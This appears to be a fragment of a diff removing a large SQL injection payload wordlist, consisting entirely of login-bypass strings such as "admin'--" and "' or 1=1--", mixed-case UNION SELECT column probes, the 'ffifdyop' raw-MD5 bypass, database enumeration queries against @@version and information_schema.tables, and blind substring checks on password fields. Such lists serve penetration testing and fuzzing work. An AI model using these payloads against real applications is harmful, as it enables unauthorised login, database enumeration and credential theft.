"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
